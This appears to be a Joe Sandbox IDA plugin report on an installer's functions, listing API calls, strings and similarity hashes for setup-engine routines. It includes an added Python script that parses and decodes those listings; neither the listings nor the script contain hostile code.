                                                                                                                                                                    APIs
                                                                                                                                                                    • GetParent.USER32(?), ref: 698ED38D
                                                                                                                                                                      • Part of subcall function 698DE153: GetWindowLongW.USER32(?,000000F0), ref: 698DE179
                                                                                                                                                                      • Part of subcall function 698DE153: GetParent.USER32 ref: 698DE18B
                                                                                                                                                                      • Part of subcall function 698DE153: GetWindowRect.USER32(?,?), ref: 698DE1A5
                                                                                                                                                                      • Part of subcall function 698DE153: GetWindowLongW.USER32(?,000000F0), ref: 698DE1BB
                                                                                                                                                                      • Part of subcall function 698DE153: MonitorFromWindow.USER32(?,00000002), ref: 698DE1DA
                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 698ED3A3
                                                                                                                                                                      • Part of subcall function 698ED149: __EH_prolog3.LIBCMT ref: 698ED150
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED198
                                                                                                                                                                      • Part of subcall function 698ED149: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 698ED1AF
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED1E4
                                                                                                                                                                      • Part of subcall function 698ED149: GetDlgItem.USER32(?,00000068), ref: 698ED1F5
                                                                                                                                                                      • Part of subcall function 698ED149: SendMessageW.USER32(00000000,00000170,?,00000000), ref: 698ED209
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED231
                                                                                                                                                                      • Part of subcall function 698ED149: GetDlgItem.USER32(?,00000069), ref: 698ED242
                                                                                                                                                                      • Part of subcall function 698ED149: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 698ED256
                                                                                                                                                                      • Part of subcall function 698ED149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED27E
                                                                                                                                                                      • Part of subcall function 698ED073: __EH_prolog3.LIBCMT ref: 698ED07A
                                                                                                                                                                      • Part of subcall function 698ED073: SetDlgItemTextW.USER32(?,00000065,?), ref: 698ED130
                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 698ED3B9
                                                                                                                                                                      • Part of subcall function 698E0B11: SetWindowLongW.USER32(?,000000FC,?), ref: 698E0B2D
                                                                                                                                                                    • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 698ED3E4
                                                                                                                                                                      • Part of subcall function 698ED86C: _memset.LIBCMT ref: 698ED8B6
                                                                                                                                                                      • Part of subcall function 698ED86C: SendMessageW.USER32(?,0000043A,00000001,?), ref: 698ED8D9
                                                                                                                                                                    • SendMessageW.USER32(?,000000CF,00000001,00000000), ref: 698ED3FC
                                                                                                                                                                      • Part of subcall function 698ECFA5: __EH_prolog3.LIBCMT ref: 698ECFAC
                                                                                                                                                                      • Part of subcall function 698ECFA5: GetDlgItem.USER32(?,00000067), ref: 698ED018
                                                                                                                                                                      • Part of subcall function 698ECFA5: SetWindowLongW.USER32(?,000000FC,?), ref: 698ED041
                                                                                                                                                                      • Part of subcall function 698ECFA5: SetDlgItemTextW.USER32(?,00000067,?), ref: 698ED05A
                                                                                                                                                                      • Part of subcall function 698ED2BF: __EH_prolog3.LIBCMT ref: 698ED2C6
                                                                                                                                                                      • Part of subcall function 698ED2BF: SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 698ED2FC
                                                                                                                                                                      • Part of subcall function 698ED2BF: SetDlgItemTextW.USER32(?,00000008,00000000), ref: 698ED33B
                                                                                                                                                                    • GetDlgItem.USER32(?,0000000B), ref: 698ED424
                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 698ED42D
                                                                                                                                                                    • GetDlgItem.USER32(?,00000069), ref: 698ED482
                                                                                                                                                                    • GetDlgItem.USER32(?,0000006A), ref: 698ED4D5
                                                                                                                                                                    • PostMessageW.USER32(?,000006F5,00000000,00000000), ref: 698ED53E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Item$MessageWindow$Send$Text$H_prolog3ImageLoadLong$Parent$CallbackDispatcherFromMonitorPostRectUser_memset
                                                                                                                                                                    • String ID: IDS_PRINT$IDS_SAVE
                                                                                                                                                                    • API String ID: 3208048787-3437764585
                                                                                                                                                                    • Opcode ID: 6c2b1860690df5719d608f11825f282beadcc28a902c5fb102a375570f6056f5
                                                                                                                                                                    • Instruction ID: 06bbcd8b911a2088699b477e4ef5c52e33965d044a592e755ef0ed984e2c1420
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c2b1860690df5719d608f11825f282beadcc28a902c5fb102a375570f6056f5
                                                                                                                                                                    • Instruction Fuzzy Hash: 75517A75604345AFDB10DF68C884B1ABBE5FF8A718F004A2DF5559B2A0CB75E818CB52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D77882
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,69D7781A,?,69DA831D,00000000), ref: 69D778B2
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,69DA831D,00000000), ref: 69D778D8
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,69DA831D,00000000), ref: 69D778E4
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D778F9
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,?,?,69DA831D,00000000), ref: 69D7790E
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D77931
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D7798A
                                                                                                                                                                    Strings
                                                                                                                                                                    • DW0200, xrefs: 69D778C9
                                                                                                                                                                    • DW\DW20.exe, xrefs: 69D7795E
                                                                                                                                                                    • \Microsoft Shared\DW\DW20.exe, xrefs: 69D7791D
                                                                                                                                                                    • Software\Microsoft\PCHealth\ErrorReporting\DW\Installed, xrefs: 69D778A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile$CloseFolderH_prolog3OpenPathQueryValue
                                                                                                                                                                    • String ID: DW0200$DW\DW20.exe$Software\Microsoft\PCHealth\ErrorReporting\DW\Installed$\Microsoft Shared\DW\DW20.exe
                                                                                                                                                                    • API String ID: 2337823764-2373061612
                                                                                                                                                                    • Opcode ID: 03fbdc5013002e86928adae0e682aa1aec47daabe894417c22c05eea257b1241
                                                                                                                                                                    • Instruction ID: f229d393f4b54c2049eb14fe461f576dd3bc147818370311665eca68e61e07b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 03fbdc5013002e86928adae0e682aa1aec47daabe894417c22c05eea257b1241
                                                                                                                                                                    • Instruction Fuzzy Hash: FE3180B490024AEFEF11CFA4CC85ABFBAB9FF15319F504538E524E6690D7348915CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

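                                                                                                                                                                     The API listings in these blocks (the DW20.exe lookup just above, and the dialog-handling block before it) are flat text. Triage is easier once each call line is split into API name, module, operands, the code reference and the "Part of subcall function" caller, and once the raw immediates the plugin prints are decoded (HKEY roots, registry access masks, CSIDL folder ids, window messages). The script below is an added example written for this report; it is not Joe Sandbox code, and the regular expression and constant tables are assumptions about the rendered layout, not a documented format. The sample lines are copied verbatim from the blocks above.

```python
"""Parse Joe Sandbox 'APIs' listing lines into records and decode common Win32 constants.

Added example for this report, not Joe Sandbox code. LINE_RE and the constant tables are
assumptions derived from the visible line layout.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# Sample lines copied from the report blocks above.
SAMPLE = r"""
• Part of subcall function 698ED149: GetDlgItem.USER32(?,00000068), ref: 698ED1F5
• RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,69D7781A,?,69DA831D,00000000), ref: 69D778B2
• RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,69DA831D,00000000), ref: 69D778D8
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,?,?,69DA831D,00000000), ref: 69D7790E
• SendMessageW.USER32(?,000000CF,00000001,00000000), ref: 698ED3FC
• __EH_prolog3.LIBCMT ref: 69D77882
"""

# One call per line: optional caller prefix, Api.MODULE, optional (operands), ', ref: ADDR'.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Arg = Union[int, str, None]  # None stands for '?', an operand the plugin could not recover


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                 # address of the call site
    caller: Optional[int]    # set when the line is 'Part of subcall function X'


# Well-known constants (documented Win32 values); only used when the api/index pair matches.
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
CSIDL = {0x07: "CSIDL_STARTUP", 0x18: "CSIDL_COMMON_STARTUP", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
         0x26: "CSIDL_PROGRAM_FILES", 0x2B: "CSIDL_PROGRAM_FILES_COMMON"}
WINDOW_MSGS = {0x80: "WM_SETICON", 0xCF: "EM_SETREADONLY", 0xF7: "BM_SETIMAGE", 0x170: "STM_SETICON"}

DECODERS: Dict[tuple, Dict[int, str]] = {
    ("RegOpenKeyExW", 0): HKEY_ROOTS, ("RegOpenKeyExW", 3): KEY_ACCESS,
    ("RegOpenKeyExA", 0): HKEY_ROOTS, ("RegOpenKeyExA", 3): KEY_ACCESS,
    ("SHGetFolderPathW", 1): CSIDL, ("SHGetFolderPathA", 1): CSIDL,
    ("SendMessageW", 1): WINDOW_MSGS, ("PostMessageW", 1): WINDOW_MSGS,
}


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    # The plugin prints immediates as exactly 8 hex digits; anything else is a string operand.
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers such as 'APIs' or 'Strings' are not call lines
        raw = m.group("args")
        # Assumption: operands are comma separated and contain no commas (true for this report).
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        caller = m.group("caller")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(caller, 16) if caller else None))
    return calls


def decode_args(call: ApiCall) -> Dict[int, str]:
    """Map operand index -> symbolic name for every operand a table knows."""
    out = {}
    for i, a in enumerate(call.args):
        table = DECODERS.get((call.api, i))
        if table and isinstance(a, int) and a in table:
            out[i] = table[a]
    return out


def render(call: ApiCall) -> str:
    names = decode_args(call)
    parts = []
    for i, a in enumerate(call.args):
        if i in names:
            parts.append(names[i])
        elif a is None:
            parts.append("?")
        elif isinstance(a, int):
            parts.append(f"0x{a:X}")
        else:
            parts.append(repr(a))
    prefix = f"[sub {call.caller:08X}] " if call.caller is not None else ""
    return f"{prefix}{call.ref:08X} {call.api}({', '.join(parts)})"


if __name__ == "__main__":
    for c in parse_api_listing(SAMPLE):
        print(render(c))
```

                                                                                                                                                                     Run against the DW20.exe block, the decoded output reads RegOpenKeyExW(HKEY_LOCAL_MACHINE, 'Software\Microsoft\PCHealth\ErrorReporting\DW\Installed', 0x0, KEY_READ, ...) followed by SHGetFolderPathW(0x0, CSIDL_PROGRAM_FILES_COMMON, ...), which together with the string "\Microsoft Shared\DW\DW20.exe" shows the function probing the registry first and the Common Files directory second. Operands shown as "?" are stack values the IDA plugin could not recover statically; treat them as unknown rather than zero.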
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D91832
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D79703: __EH_prolog3.LIBCMT ref: 69D7970A
                                                                                                                                                                      • Part of subcall function 69D79703: VariantInit.OLEAUT32(?), ref: 69D7971B
                                                                                                                                                                      • Part of subcall function 69D79703: SysFreeString.OLEAUT32(69D6A794), ref: 69D79751
                                                                                                                                                                      • Part of subcall function 69D79703: VariantClear.OLEAUT32(?), ref: 69D7978E
                                                                                                                                                                      • Part of subcall function 69D78F47: __EH_prolog3.LIBCMT ref: 69D78F4E
                                                                                                                                                                      • Part of subcall function 69D78F47: SysFreeString.OLEAUT32(?), ref: 69D78F98
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FreeStringVariant$ClearInit
                                                                                                                                                                    • String ID: For upgradecode %s, [%d] related products were found.$ProductCode$RelatedProducts item %s has %d related products.$Relation$SkipProduct$UpgradeCode$VersionMax$VersionMaxInclusive$VersionMin$VersionMinInclusive
                                                                                                                                                                    • API String ID: 2081811287-792701010
                                                                                                                                                                    • Opcode ID: c088ec63df55771b35d11ad54be74cc990bb9ccdaead88b3991ff2564cfe25ce
                                                                                                                                                                    • Instruction ID: eede964bba662dd459da339b37f393cdf4d16e75d89be484390f0c80810b01c3
                                                                                                                                                                    • Opcode Fuzzy Hash: c088ec63df55771b35d11ad54be74cc990bb9ccdaead88b3991ff2564cfe25ce
                                                                                                                                                                    • Instruction Fuzzy Hash: E6024AB5D00259EFCB01DFE8C984AADBBB9BF09318F148569F015EB751C734AA05CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698DD92A
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD960
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD9BA
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDA0D
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698DDAAF
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000), ref: 698DDAD0
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 698DDB07
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDB38
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDBB5
                                                                                                                                                                    Strings
                                                                                                                                                                    • Could not find mandatory data file %s. This is a bad package., xrefs: 698DDB6E
                                                                                                                                                                    • ReadXML failed to open XML file %s, with error %d, xrefs: 698DDA8B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$H_prolog3Path$AllocChangeCloseCombineException@8FindModuleNameNotificationPointerReadRelativeStringThrow
                                                                                                                                                                    • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                                                                                                    • API String ID: 1788304661-4172873023
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D8539D
• SysFreeString.OLEAUT32(?), ref: 69D85420
• SysAllocString.OLEAUT32(69DAFA6E), ref: 69D85490
• __EH_prolog3.LIBCMT ref: 69D854B8
• __CxxThrowException@8.LIBCMT ref: 69D85540
  • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
  • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
Strings
• //Setup/LocalizedData/Language, xrefs: 69D853CC
• W, xrefs: 69D85530
• Schema validation failure in file , xrefs: 69D85575
• Unable to find Language element for LangID="%d" in localized data, xrefs: 69D8551A
• \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 69D85599
• ParameterInfo.xml, xrefs: 69D85565
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$String$AllocException@8FreeThrow
• String ID: //Setup/LocalizedData/Language$ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
• API String ID: 191698298-1863159554
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch.LIBCMT ref: 69D94746
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA8380: __EH_prolog3.LIBCMT ref: 69DA8387
  • Part of subcall function 69D7388B: __EH_prolog3.LIBCMT ref: 69D73892
  • Part of subcall function 69D94464: __EH_prolog3.LIBCMT ref: 69D9446B
  • Part of subcall function 69D94682: __EH_prolog3.LIBCMT ref: 69D94689
• CoInitialize.OLE32(00000000), ref: 69D947F7
• CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,?,?,69D73864,?,00000000,00000000,69DAFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 69D94815
  • Part of subcall function 69DB9D05: GetCommandLineW.KERNEL32(F0D05EFD,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 69DB9D54
• CoUninitialize.OLE32(?,02602230,00000000,?,?,succeeded,69D6A794,?,?,?,?,69D73864,?,00000000,00000000,69DAFA6E), ref: 69D948ED
• SysFreeString.OLEAUT32(00000000), ref: 69D948F9
• SysAllocString.OLEAUT32(?), ref: 69D9492E
• __CxxThrowException@8.LIBCMT ref: 69D949BE
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$String$AllocCommandCreateException@8FreeH_prolog3_catchInitializeInstanceLineThrowUninitialize
• String ID: IronMan::EngineData::CreateEngineData$ParameterInfo.xml$succeeded$threw exception
• API String ID: 1482071144-3644667230
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F6EE9
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698E31A0: __EH_prolog3.LIBCMT ref: 698E31A7
  • Part of subcall function 698E31A0: _wcschr.LIBCMT ref: 698E31E8
  • Part of subcall function 698E31A0: __CxxThrowException@8.LIBCMT ref: 698E32A2
  • Part of subcall function 698E31A0: PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,698F6F33,?,?,00000000,00000044,698F668B,?,00000000,00000000,?,?,succeeded), ref: 698E32B9
  • Part of subcall function 698E31A0: PathFileExistsW.SHLWAPI(00000000,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E32C6
  • Part of subcall function 698E45DE: __EH_prolog3.LIBCMT ref: 698E45E5
  • Part of subcall function 698E60C9: __EH_prolog3.LIBCMT ref: 698E60D0
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$Path$Exception@8ExistsFileRelativeThrow_wcschr
• String ID: ?$EulaPage$FinishPage$MaintenanceModePage$ProgressPage$ResourceDll$SystemRequirementsPage$WelcomePage$Windows
• API String ID: 1182493169-944454811
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D8E315
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
  • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
• __CxxThrowException@8.LIBCMT ref: 69D8E62B
  • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
• String ID: ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$File$IsPresent$ParameterInfo.xml$schema validation failure: wrong number of File child nodes!
• API String ID: 3417717588-3917201069
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D9128E
  • Part of subcall function 69D78D44: __EH_prolog3.LIBCMT ref: 69D78D4B
  • Part of subcall function 69D8784C: __EH_prolog3.LIBCMT ref: 69D87853
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: !$ActionTable$ApplicableIf$CustomErrorHandling$IsPresent$MSIRepairOptions$MSIUninstallOptions$Name$RelatedProducts
                                                                                                                                                                    • API String ID: 431132790-4204973247
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D94AE0
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D789B7: __EH_prolog3.LIBCMT ref: 69D789BE
  • Part of subcall function 69D789B7: __CxxThrowException@8.LIBCMT ref: 69D78A89
• __CxxThrowException@8.LIBCMT ref: 69D94E3F
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
